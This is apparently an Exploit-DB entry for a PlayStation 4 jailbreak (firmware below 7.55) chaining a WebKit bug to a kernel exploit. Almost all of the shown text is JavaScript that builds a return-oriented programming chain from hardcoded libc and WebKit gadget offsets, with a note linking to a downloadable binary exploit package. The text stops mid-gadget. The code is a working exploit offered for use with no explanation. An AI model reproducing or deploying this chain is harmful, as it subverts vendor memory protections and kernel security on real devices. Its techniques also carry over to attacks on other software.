sony playstation 4 (ps4) < 7.55 jailbreak webkit kernel loader sock_raw ip6_exthdr_check
// EDB-Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/49664.zip var ropchain_array = new Uint32Array(337302); var ropchain = read_ptr_at(addrof(ropchain_array)+0x10); var ropchain_offset = 2; function set_gadget(val) { ropchain_array[ropchain_offset++] = val | 0; ropchain_array[ropchain_offset++] = (val / 4294967296) | 0; } function set_gadgets(l) { for(var i = 0; i < l.length; i++) set_gadget(l[i]); } function db(data) { for(var i = 0; i < data.length; i++) ropchain_array[ropchain_offset++] = data[i]; } var main_ret = malloc(8); var printf_buf = malloc(65536); var __swbuf_addr = 0; // STUB set_gadgets([ libc_base+763368, //pop rcx ropchain+65720, //rdi_bak libc_base+533450, //mov [rcx], rdi libc_base+144605, //pop rdi ropchain+65680, //stack_bottom libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax ropchain+112, //ret_addr libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+1221872, //_main //ret_addr: libc_base+782311, //pop rsp ropchain+65680 //stack_bottom ]); //_ps4_printf_buffer: var printf_buf_offset = 128; set_gadget(printf_buf); //_ps4_printf_fd: db([4294967295, 4294967295]); // -0x1 //stack: ropchain_offset += 16384; //stack_bottom: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi main_ret, webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //rdi_bak: //_pivot_back_addr: db([0, 0]); // 0x0 set_gadgets([ pivot_addr, //___builtin_bswap16: libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+65800, //L1 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L1: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi 
ropchain+65896, //L2 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+65928, //L5 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L2: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L5: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+66032, //L8 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+66016, //L6 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L6: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L8: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+66192, //L12 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+66160, //L10 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+66176, //L11 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L10: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+66248, //L14 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L14: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+66376, //L16 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+66392, //L17 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66360, //L15 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L15: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L16: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L17: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+66552, //L21 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+66520, //L19 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66536, //L20 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L18: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L19: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L20: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L21: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+66656, //L23 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66640, //L22 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L22: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L23: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L24: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L25: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl 
libc_base+764760, //pop rsi ropchain+66864, //L28 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+66848, //L27 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L26: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L27: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L28: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+66968, //L30 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+66952, //L29 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L29: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L30: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+67048, //L31 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L31: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L33: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+67168, //L36 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+67152, //L34 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L34: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L36: db([0, 0]); // 0x0 set_gadgets([ libc_base+224144, //mov ax, [rdi] libc_base+764760, //pop rsi ropchain+67328, //L40 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+67296, //L38 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+67312, //L39 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L37: db([16, 0]); // 0x10 set_gadget(webkit_base+3236123,); //pop r9 //L38: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L39: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L40: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+67384, //L42 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L42: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+67512, //L44 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+67528, //L45 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+67496, //L43 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L43: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L44: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L45: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+67688, //L49 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+67656, //L47 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+67672, //L48 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L46: db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L47: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L48: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L49: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl 
libc_base+764760, //pop rsi ropchain+67792, //L51 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+67776, //L50 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L50: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L51: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L52: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L53: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+67992, //L56 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+67976, //L55 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L54: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L55: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L56: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+68096, //L58 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+68080, //L57 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L57: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L58: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+68208, //L61 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+68192, //L60 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L59: 
db([48, 0]); // 0x30 set_gadget(webkit_base+3236123,); //pop r9 //L60: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L61: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+68272, //L63 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+763368 //pop rcx ]); //L63: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+68328, //L64 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L64: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+68480, //L67 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68496, //L68 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+68464, //L66 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L66: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L67: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L68: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+68608, //L69 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68640, //L71 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+68624, //L70 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L69: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L70: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L71: db([0, 
0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+68744, //L72 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68760, //L73 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L72: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L73: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+68880, //L74 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+68864, //L75 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L75: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L74: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+68968, //L77 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+68952, //L76 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L76: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L77: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+69072, //L78 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+69088, //L79 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L78: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L79: db([0, 0]); // 
0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+69208, //L80 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+69192, //L81 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L81: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L80: db([0, 0]); // 0x0 //___builtin_bswap32: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+69280, //L83 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L83: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+69376, //L84 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+69408, //L87 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L84: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L86: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L87: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+69512, //L90 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+69496, //L88 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L88: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L90: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+69688, //L93 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+69704, //L94 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+69656, //L91 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+69672, //L92 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L91: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L92: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L93: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L94: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+69800, //L96 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+69784, //L95 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L95: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L96: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L97: db([24, 0]); // 0x18 set_gadget(libc_base+763368,); //pop rcx //L98: db([24, 0]); // 0x18 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+70000, //L101 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+69984, //L100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L99: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L100: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L101: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, 
//shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+70104, //L103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+70088, //L102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L102: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L103: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+70192, //L104 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L104: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L106: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+70312, //L109 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+70296, //L107 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L107: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L109: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+70488, //L112 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+70504, //L113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+70456, //L110 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+70472, //L111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L110: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L111: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L112: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L113: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+70600, //L115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+70584, //L114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L114: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L115: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L117: db([16711680, 0]); // 0xff0000 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+70712, //L118 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L118: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L120: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L121: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+70944, //L124 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+70928, //L123 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L122: db([32, 0]); // 0x20 
set_gadget(webkit_base+3236123,); //pop r9 //L123: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L124: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+71048, //L126 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+71032, //L125 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L125: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L126: db([0, 0]); // 0x0 set_gadgets([ libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+71104, //L128 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L128: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+71160, //L129 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L129: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+71272, //L131 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L131: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L133: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+71392, //L136 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+71376, //L134 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L134: db([0, 0]); 
// 0x0 set_gadget(libc_base+144605,); //pop rdi //L136: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+71568, //L139 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+71584, //L140 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+71536, //L137 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+71552, //L138 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L137: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L138: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L139: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L140: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+71680, //L142 webkit_base+660161, //mov 